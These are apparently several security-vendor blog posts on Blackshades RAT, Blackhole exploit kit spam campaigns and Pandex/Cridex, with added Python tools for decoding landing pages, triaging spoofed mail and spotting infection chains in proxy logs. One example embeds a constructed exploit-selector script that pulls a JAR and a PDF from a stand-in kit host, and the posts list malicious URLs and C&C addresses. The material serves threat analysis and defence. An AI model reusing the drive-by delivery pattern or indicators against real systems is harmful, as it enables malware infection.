Blackshades Rat Usage on the Rise Despite Author’s Alleged Arrest

Back in 2012, a key player involved with the prominent Remote Administration Tool (RAT) known as Blackshades RAT was reportedly arrested. Despite his alleged arrest, and with its code leaked in 2010, the tool is still being sold and used in cybercriminal activity. Symantec Security Response has noticed that the use of the RAT has increased over the last five months.
 
Blackshades RAT, detected by Symantec products as W32.Shadesrat, gathers passwords and credentials from infected systems and sends them back to the malicious command-and-control (C&C) server. This increase in activity prompted us to investigate the main C&C servers that manage the latest infections. Upon investigation, we found a connection to the Cool Exploit Kit, which has been used to distribute W32.Shadesrat as well as several other malware families.
 
Figure 1. Shadesrat evolution since July 2013
 
For the last few years we have seen a spectacular increase in attacks that compromise Web servers through recently discovered vulnerabilities and use them to target industries, think tanks, government institutions and end users. In all cases the attacker's goal is clear: to execute a malicious payload on the user's computer. The attackers achieve this using different exploit kits.
 
When Symantec observed the increase in W32.Shadesrat infections, we identified hundreds of C&C servers being used to gather credentials from compromised computers. W32.Shadesrat targets a wide variety of credentials, including those for email services, Web services, instant messaging applications, and FTP clients. Such credentials are valuable to spammers seeking fresh mail accounts, to intruders extending a breach into new servers and services, and to attackers after specific information to exfiltrate.
 
During our research, we found that nearly all of the C&C servers have hosted exploit kits at some point. Until the arrest of the author of the Blackhole Exploit Kit and the Cool Exploit Kit, the latter was the most prevalent. These kits try to exploit different vulnerabilities on the user's computer to execute a malicious payload and infect it. Underground teams have a wide range of resources at their disposal for these attacks.
 
Figure 2. Exploit kits used by C&C servers from September and October until arrest
 
We also observed that after the arrest of the author of the Blackhole Exploit Kit and Cool Exploit Kit, both exploit kits have nearly disappeared, leaving Neutrino as the new kit of choice.
 
Figure 3. Exploit kits used by C&C servers from October and November after arrest
 
Once an unsuspecting user has been compromised, multiple payloads are downloaded: Remote Administration Tools to retain control, and downloaders that let the attackers install additional malware with new functionality.
 
The C&C servers also spread the following other malware threats.
 
Figure 4. Threats spread by C&C servers in September and October
 
We used our telemetry systems to locate the C&C servers and to identify where W32.Shadesrat infections are most prominent.
 
Figure 5. C&C server locations
 
Figure 6. W32.Shadesrat infections
 
Lithuania and the United States host the highest number of C&C servers. India is the most affected country, followed by the United States and the United Kingdom, but countries all around the world have been affected by W32.Shadesrat.
 
The distribution of the threats suggests that the attackers attempted to infect as many computers as possible. The attackers do not seem to have targeted specific people or companies.
 
This demonstrates how extensive the threat landscape is, and the resources that attackers have at their disposal. Make sure your software is up to date and that your antivirus solution has the latest definitions.

The Dangers of a Royal Baby: Scams Abound

Big news stories are always an opportunity for scammers and spammers, who attempt to redirect users to malicious exploit kits or other unwanted services. Britain’s royal baby is the latest news to offer cover for malware. We have already found a lot of spam messages regarding the birth and baby that lead users to the infamous Blackhole exploit kit.

The initial infection arrives as spam mail that contains a redirection URL in the following format:

  • hxxp://[infectedDomain]/[Random]/index.html

Figure 1: Spam email.

From there the user will land on a page with links to JavaScript files as in the next image:


Figure 2: Spam URL.

This first-level page contains three *.js URLs that point to other compromised or malicious domains. Once victims land on this page, the JavaScript files lead them to a page like the following:


Figure 3: Blackhole landing page redirector.

The second-level URL is the actual landing page of the Blackhole exploit kit, which serves the following content:


Figure 4: Customized encoded Blackhole landing page.

Decoding the customized base64-encoded Blackhole landing page yields a "plug-in detect" JavaScript: code Blackhole uses to fingerprint which plug-ins are installed in the browser, and in which versions, so it can serve the exploit that matches the plug-in versions present on the victim's machine. The next image shows the decoded PluginDetect.js:


Figure 5: Decoded Blackhole landing page (PluginDetect.js with malicious URL).
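An analyst looking at a page like Figure 4 wants to get past the encoding and list what the kit probes and where it sends the browser next. The following Python is an added example, not code from the original post or from McAfee: it unwraps base64-wrapped script layers, follows nested layers, and collects the plug-ins the PluginDetect stage queries and the payload URLs it references. The landing page, host names and file names are constructed for the example; since the post notes that Blackhole's encoding was customised on top of base64, unwrap_base64_blobs() assumes plain base64 and is the part to adapt for a live sample.

```python
"""Unwrap a base64-encoded exploit-kit landing page and pull out its indicators.

Added example, not code from the original post or from McAfee. The landing page,
hosts and file names below are constructed; real Blackhole pages used a
customised encoding on top of base64, so unwrap_base64_blobs() is the function
to adapt for a live sample.
"""
import base64
import re

# Constructed stand-in for the decoded PluginDetect.js selector: probe plug-in
# versions, then write in the exploit for whichever vulnerable version is present.
INNER_JS = r"""
var jv = PluginDetect.getVersion("Java");
var pv = PluginDetect.getVersion("AdobeReader");
if (jv && jv.split(",")[0] == "1" && parseInt(jv.split(",")[1]) <= 7) {
  document.write('<applet archive="hxxp://kit-host.invalid/a/abc.jar"></applet>');
}
if (pv && parseInt(pv.split(",")[0]) < 10) {
  document.write('<iframe src="hxxp://kit-host.invalid/a/doc.pdf"></iframe>');
}
"""
_BLOB = base64.b64encode(INNER_JS.encode()).decode()
# Constructed outer page: one script that base64-decodes the blob and eval()s it.
LANDING_PAGE = ("<html><body><script>var s='" + _BLOB +
                "';eval(atob(s));</script></body></html>")

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long base64 runs
URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s'\"<>]+", re.I)  # plain or defanged URLs
PLUGIN_RE = re.compile(r'PluginDetect\.getVersion\("([A-Za-z]+)"\)')


def unwrap_base64_blobs(html: str) -> list:
    """Return every long base64 run in `html` that decodes to readable text."""
    layers = []
    for m in B64_RE.finditer(html):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or binary: skip rather than guess
        if all(c.isprintable() or c.isspace() for c in text):
            layers.append(text)
    return layers


def extract_indicators(html: str) -> dict:
    """Walk every decoded layer; collect plug-ins probed and payload URLs referenced."""
    plugins, urls, seen = set(), set(), set()
    pending = [html]
    while pending:
        layer = pending.pop()
        if layer in seen:
            continue
        seen.add(layer)
        plugins.update(PLUGIN_RE.findall(layer))
        urls.update(URL_RE.findall(layer))
        pending.extend(unwrap_base64_blobs(layer))  # nested encoding layers, if any
    return {"plugins": sorted(plugins), "urls": sorted(urls)}


if __name__ == "__main__":
    print(extract_indicators(LANDING_PAGE))
```

The printable-text filter is what keeps the decoder honest: a base64 run that decodes to binary (a JAR, a PDF) is deliberately skipped instead of being treated as another script layer, and a page that carries several wrapped layers is walked until nothing new decodes.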

The following browser plug-ins are known to be targeted by the exploit kit:

  • Java Runtime Environment
  • Adobe PDF Reader
  • Flash

McAfee coverage for the PluginDetect.js zero-day threat is JS/Exploit!JNLP.d.

The following images show the PDF and JAR payloads fetching the malicious URL embedded in PluginDetect.js:


Figure 6: JAR file downloading the URL in PluginDetect.js.


Figure 7: PDF file downloading the URL in PluginDetect.js.

This redirection chain could leave victims infected with one of these malware families:

For more detail about the Blackhole exploit kit, please refer to the McAfee Threat Advisory Library.

Thanks to my colleague Rohan Shah for his assistance with this blog.

Blackhole Exploit Kit Spam Campaigns Disguised as Top Service Brands

Spam campaigns based on the Blackhole Exploit Kit send messages that contain links to compromised legitimate websites, which serve hidden iframes and redirections that exploit vulnerabilities across operating systems, from Android to Windows. Spam themes vary rapidly and are disguised to appear as legitimate messages from familiar services. Campaigns spoofing Facebook, LinkedIn, American Airlines, and various banking services carry embedded links to malware. Spammers abuse email templates from familiar service providers by capturing automated emails, replacing the links in the template with links to malware, and rebroadcasting those messages to harvested or predicted recipients.

This tactic has proven effective for spammers. Recipients are likely to click links in familiar-looking emails and often create custom whitelist entries for common sending domains without enforcing Sender Policy Framework or DomainKeys Identified Mail validation.

The Messaging Security Team at McAfee Labs has closely monitored this trend and would like to share a few common traits from recent campaigns to aid in identification:

  • Messages are disguised to appear as legitimate mails from well-known service providers
  • Subject lines are catchy and mimic those of the spoofed service provider

Subject line examples:

  • Your Verizon wireless bill
  • Pending Wire Transfer Notification – Ref: 15192
  • TrustKeeper Network Scan Information
  • BBC-Email: USA government decided to follow Cyprus and rise deposit taxes!!!
  • [FIRSTNAME LASTNAME] left you a comment…
  • Your order # ID[Random digits] has been completed

Other features:

  • URL paths commonly end in …/random_word.html or …/random_word.php
  • Spammers recycle templates across campaigns. These emails could have embedded links to malware or attached .zip/executable files.
  • Unsubscribe links are typically missing or replaced with malicious links
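The two points above that a mail gateway can act on are the whitelist problem (a familiar From: domain means nothing unless the message authenticates as that domain) and the body tell-tales of a recycled template. The Python below is an added example, not code from the original post or from McAfee Labs: it honours an allowlist entry only when SPF or DKIM passed for a domain aligned with the From: domain, and scores the template-abuse traits listed above (link text naming one host while the href points at another, random_word.html/.php paths, no unsubscribe link). The two messages, the host names and the allowlist are constructed; the Authentication-Results header is assumed to have been stamped by your own border MTA, since one arriving from outside can be forged.

```python
"""Gate an allowlist on SPF/DKIM alignment and score Blackhole template tell-tales.

Added example, not code from the original post or from McAfee Labs. Messages,
hosts and the allowlist are constructed. The Authentication-Results header is
assumed to come from your own border MTA; an external one can be forged.
"""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

ALLOWLIST = {"linkedin.com", "facebook.com"}  # constructed "familiar sender" list

# Constructed: recycled LinkedIn-style template with its links swapped for a
# compromised site. SPF passes, but for the spammer's own domain, not linkedin.com.
SPAM_RAW = """\
From: LinkedIn <messages-noreply@linkedin.com>
To: victim@example.org
Subject: [FIRSTNAME LASTNAME] left you a comment...
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=bulk-relay.invalid; dkim=none
Content-Type: text/html

<html><body>
<p>See the comment: <a href="http://compromised-site.invalid/wp-content/nnmrvk.php">http://www.linkedin.com/comments/2219</a></p>
</body></html>
"""

# Constructed: a genuine notification, SPF and DKIM aligned with the From: domain.
LEGIT_RAW = """\
From: LinkedIn <messages-noreply@linkedin.com>
To: victim@example.org
Subject: You have a new connection
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=linkedin.com; dkim=pass header.d=linkedin.com
Content-Type: text/html

<html><body>
<p><a href="https://www.linkedin.com/people/123">See who</a></p>
<p><a href="https://www.linkedin.com/unsubscribe">Unsubscribe</a></p>
</body></html>
"""

HREF_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
RANDOM_WORD_PATH = re.compile(r"/[a-z0-9_]{4,}\.(?:html|php)$", re.I)


def _aligned(auth_dom: str, from_dom: str) -> bool:
    """Relaxed alignment: the authenticated domain is the From: domain or a subdomain of it."""
    auth_dom = auth_dom.lower()
    return auth_dom == from_dom or auth_dom.endswith("." + from_dom)


def authenticated_from_domain(msg):
    """Return the From: domain only if SPF or DKIM passed for an aligned domain, else None."""
    from_dom = parseaddr(str(msg["From"]))[1].rsplit("@", 1)[-1].lower()
    ar = str(msg.get("Authentication-Results", ""))
    for pat in (r"spf=pass\s+smtp\.mailfrom=([\w.-]+)", r"dkim=pass\s+header\.d=([\w.-]+)"):
        m = re.search(pat, ar)
        if m and _aligned(m.group(1), from_dom):
            return from_dom
    return None


def allowlist_applies(msg, allowlist=ALLOWLIST) -> bool:
    """Only an authenticated, aligned sender may benefit from an allowlist entry."""
    dom = authenticated_from_domain(msg)
    return dom is not None and dom in allowlist


def template_abuse_signals(msg) -> list:
    """Body tell-tales of a captured template whose links were replaced."""
    part = msg.get_body(preferencelist=("html",))
    html = part.get_content() if part else ""
    signals = []
    for href, text in HREF_RE.findall(html):
        target = urlparse(href)
        shown = text.strip()
        if shown.lower().startswith("http") and urlparse(shown).hostname != target.hostname:
            signals.append(f"link text shows {urlparse(shown).hostname} but points to {target.hostname}")
        if RANDOM_WORD_PATH.search(target.path):
            signals.append(f"random-word .html/.php path: {href}")
    if "unsubscribe" not in html.lower():
        signals.append("no unsubscribe link")
    return signals


def triage(raw: str) -> dict:
    """Combine the sender gate and the body signals into a delivery decision."""
    msg = message_from_string(raw, policy=policy.default)
    trusted = allowlist_applies(msg)
    signals = template_abuse_signals(msg)
    return {"trusted_sender": trusted, "signals": signals,
            "verdict": "deliver" if trusted and not signals else "quarantine"}


if __name__ == "__main__":
    print(triage(SPAM_RAW))
    print(triage(LEGIT_RAW))
```

The alignment check is the point of the sender gate: a bare spf=pass is not enough, because the spammer's relay can pass SPF for its own envelope domain while the From: header still says linkedin.com. Only a pass for a domain aligned with From: unlocks the allowlist entry.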

Blackhole Spam Samples

Fake wire-transfer campaign:


Fake LinkedIn campaign:


Fake Facebook campaign:


You will notice that all of these samples carry fake .html or .php links, highlighted in red in the foregoing samples. These are the links carrying payloads that we need to be aware of.

The bad guys use many techniques to deliver their spam; social engineering is a reality. Messaging Security advises caution when clicking links in emails: hover first! Employ multiple layers of defense in your environment, from email defense to web security to antimalware, and keep those definitions up to date!

Trojan.Pandex – A New Spam Affair

Contributor: Lionel Payet

Last week we saw how W32.Waledac was getting cozy with W32.Virut, but let us not forget about other spam botnets, like Trojan.Pandex (a.k.a. Cutwail), as they also persist in their propagation affairs.

The people behind W32.Cridex have used many attack vectors to spread the malware, including taking advantage of exploit kits like Blackhole, or attempting to deceive users with crafted PDF documents. This month they have managed to compose a more elaborate attack.

The attackers have managed to host a malicious HTML file at a legitimate web site, which has been compromised. This file would then redirect the user to a Blackhole exploit kit, which would deliver W32.Cridex to the compromised computer. But how did they attempt to deceive the user? By renting a botnet.

The Pandex botnet, also known as Cutwail and Pushdo, is not a new threat: it has been in the wild for more than six years and is responsible for roughly 18 percent of the spam emails detected by Symantec per day, worldwide. It not only sends spam, it is able to collect email addresses from compromised computers which can then be used in future campaigns. Symantec has several detections for the threat:

Using our telemetry systems, we can estimate the following distribution of the threat:
 

Figure 1. Heatmap illustrating the distribution of the Trojan.Pandex spam
 

W32.Cridex attack vector

The following image illustrates how W32.Cridex may arrive on a compromised computer.
 

Figure 2. W32.Cridex attack steps
 

Computers that were infected with Trojan.Pandex sent emails like the following:
 

Figure 3. Sample Trojan.Pandex email
 

If the user follows the link, a malicious HTML file hosted at judiciary.go.ke is then accessed, which would redirect the user to the following malicious URL:

  • dfudont.ru:8080/[REMOVED]/column.php

The domain resolves to the following locations:

  • 212.112.[REMOVED] (Germany)
  • 89.111.[REMOVED] (Russian Federation)
  • 91.224.[REMOVED] (Lithuania)
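The chain just described (a link in Pandex spam, a malicious HTML file on a compromised legitimate site, a redirect to Blackhole on a non-standard port, the W32.Cridex download, then C&C traffic on port 8080) has a recognisable shape in web proxy logs. The Python below is an added example, not code from the original post or from Symantec: it reconstructs that chain per client and then looks for the post-infection beacons. The log format, host names and IP addresses are constructed placeholders, not the indicators listed in the post.

```python
"""Spot the compromised-site -> exploit-kit -> payload -> C&C chain in proxy logs.

Added example, not code from the original post or from Symantec. Log lines are
constructed in an assumed simplified format
("time client method url referer status content-type"); adapt parse() to your
proxy. Hosts and IPs are placeholders, not the indicators listed in the post.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

LOG = """\
10:00:01 10.0.0.5 GET http://legit-site.invalid/news/tuns.html - 200 text/html
10:00:02 10.0.0.5 GET http://kit-host.invalid:8080/forum/links/column.php http://legit-site.invalid/news/tuns.html 200 text/html
10:00:04 10.0.0.5 GET http://kit-host.invalid:8080/forum/links/column.php?xf=1 http://kit-host.invalid:8080/forum/links/column.php 200 application/java-archive
10:00:09 10.0.0.5 POST http://203.0.113.7:8080/p/ - 200 application/octet-stream
10:00:11 10.0.0.9 GET http://www.example.com/index.php http://www.example.com/ 200 text/html
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")
PAYLOAD_TYPES = {"application/java-archive", "application/pdf",
                 "application/x-msdownload", "application/octet-stream"}
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse(log: str) -> list:
    """Parse the assumed log format into dicts; malformed lines are skipped, not fatal."""
    rows = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        t, client, method, url, ref, status, ctype = m.groups()
        rows.append({"time": t, "client": client, "method": method, "url": url,
                     "referer": None if ref == "-" else ref,
                     "status": int(status), "ctype": ctype})
    return rows


def _odd_port(url: str) -> bool:
    return urlparse(url).port not in (None, 80, 443)


def is_kit_landing(row: dict) -> bool:
    """A .php page on a non-standard port reached via a referer on a different host."""
    u = urlparse(row["url"])
    if not (_odd_port(row["url"]) and u.path.lower().endswith(".php") and row["referer"]):
        return False
    return urlparse(row["referer"]).hostname != u.hostname


def find_chains(rows: list) -> list:
    """Per client: the referring page, the kit landing URL, and the payload fetched from the kit host."""
    by_client = defaultdict(list)
    for r in rows:
        by_client[r["client"]].append(r)
    chains = []
    for client, reqs in by_client.items():
        for i, r in enumerate(reqs):
            if not is_kit_landing(r):
                continue
            kit_host = urlparse(r["url"]).hostname
            payload = next((p["url"] for p in reqs[i + 1:]
                            if urlparse(p["url"]).hostname == kit_host
                            and p["ctype"] in PAYLOAD_TYPES), None)
            chains.append({"client": client, "referer": r["referer"],
                           "landing": r["url"], "payload": payload})
    return chains


def post_infection_beacons(rows: list, chains: list) -> list:
    """After a landing, the same client talking to a bare IP on a non-standard port
    with no referer: the shape of the :8080 C&C traffic described in the post."""
    hits = []
    for c in chains:
        after_landing = False
        for r in (x for x in rows if x["client"] == c["client"]):
            if r["url"] == c["landing"]:
                after_landing = True
                continue
            host = urlparse(r["url"]).hostname or ""
            if (after_landing and r["referer"] is None
                    and _odd_port(r["url"]) and IPV4_RE.fullmatch(host)):
                hits.append(r["url"])
    return hits


if __name__ == "__main__":
    rows = parse(LOG)
    chains = find_chains(rows)
    print(chains)
    print(post_infection_beacons(rows, chains))
```

The cross-host referer test is what separates the kit landing from an ordinary site's own .php pages (the 10.0.0.9 line above is not flagged), and requiring a prior landing before counting bare-IP :8080 traffic keeps the beacon check from firing on every odd-port request in the log.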

Symantec has a number of IPS detections for the BlackHole v2 exploit kit, and our telemetry data indicates that we have detected the following signatures from the malicious URL:

  • Web Attack: Blackhole Exploit Kit Website 8
  • Web Attack: Blackhole Exploit Kit
  • Web Attack: Blackhole Functions
  • Web Attack: Blackhole Toolkit Website 20
  • Web Attack: Blackhole Toolkit Website 31

The following heatmap illustrates the distribution for the above detections:
 

Figure 4. Heatmap distribution for IPS detections associated with Blackhole exploit kit
 

If the Blackhole exploit is successful, W32.Cridex is then downloaded onto the compromised computer. Symantec has the following detections in place:

The worm then communicates with its command-and-control (C&C) servers, which can instruct it to download, upload, and execute files on the compromised computer, potentially exposing the user to even more malware.

At the time of analysis, the C&C servers being used included:

  • 140.123.[REMOVED]:8080
  • 182.237.[REMOVED]:8080
  • 220.86.[REMOVED]:8080
  • 221.143.[REMOVED]:8080
  • 64.85.[REMOVED]:8080
  • 163.23.[REMOVED]:8080
  • 210.56.[REMOVED]:8080
  • 173.245.[REMOVED]:8080
  • 173.201.[REMOVED]:8080
  • 203.217.[REMOVED]:8080
  • 97.74.[REMOVED]:8080
  • 62.28.[REMOVED]:8080
  • 69.64.[REMOVED]:8080
  • 38.99.[REMOVED]:8080
  • 174.142.[REMOVED]:8080
  • 78.28.[REMOVED]:8080
  • 88.119.[REMOVED]:8080
  • 188.117.[REMOVED]:8080
  • 217.65.[REMOVED]:8080
  • 188.165.[REMOVED]:8080

Our analysis confirms the findings of our colleagues at Dynamoo. The owner of the compromised server has been notified and the malicious file has been removed.

We advise users to ensure operating systems and software are up to date and to avoid clicking on suspicious links while browsing the Internet or checking email.